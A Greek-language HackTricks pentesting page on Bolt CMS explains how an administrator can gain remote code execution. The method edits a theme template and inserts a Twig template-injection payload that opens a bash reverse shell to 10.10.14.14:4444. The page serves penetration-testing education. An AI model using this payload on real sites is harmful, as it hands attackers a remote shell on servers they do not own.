mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
49 lines
4.8 KiB
Markdown
49 lines
4.8 KiB
Markdown
# Bolt CMS
|
||
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF**, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|
||
|
||
## RCE
|
||
|
||
Αφού συνδεθείτε ως διαχειριστής (πηγαίνετε στο /bot για να αποκτήσετε πρόσβαση στην οθόνη σύνδεσης), μπορείτε να αποκτήσετε RCE στο Bolt CMS:
|
||
|
||
* Επιλέξτε `Ρύθμιση` -> `Προβολή ρυθμίσεων` -> `Κύρια ρύθμιση` ή πηγαίνετε στη διαδρομή URL `/bolt/file-edit/config?file=/bolt/config.yaml`
|
||
* Ελέγξτε την τιμή του θέματος
|
||
|
||
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (3).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
* Επιλέξτε `Διαχείριση αρχείων` -> `Προβολή και επεξεργασία προτύπων`
|
||
* Επιλέξτε τη βάση θέματος που βρήκατε στο προηγούμενο βήμα (`base-2021` σε αυτήν την περίπτωση) και επιλέξτε το `index.twig`
|
||
* Στην περίπτωσή μου, αυτό βρίσκεται στη διαδρομή URL /bolt/file-edit/themes?file=/base-2021/index.twig
|
||
* Ορίστε το payload σας σε αυτό το αρχείο μέσω [ενσωμάτωσης προτύπων (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), όπως: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
|
||
* Και αποθηκεύστε τις αλλαγές
|
||
|
||
<figure><img src="../../.gitbook/assets/image (3) (7).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
* Απαλείψτε την προσωρινή μνήμη στο `Συντήρηση` -> `Απαλοιφή προσωρινής μνήμης`
|
||
* Προσπελάστε ξανά τη σελίδα ως κανονικός χρήστης και το payload θα πρέπει να εκτελεστεί
|
||
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF**, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|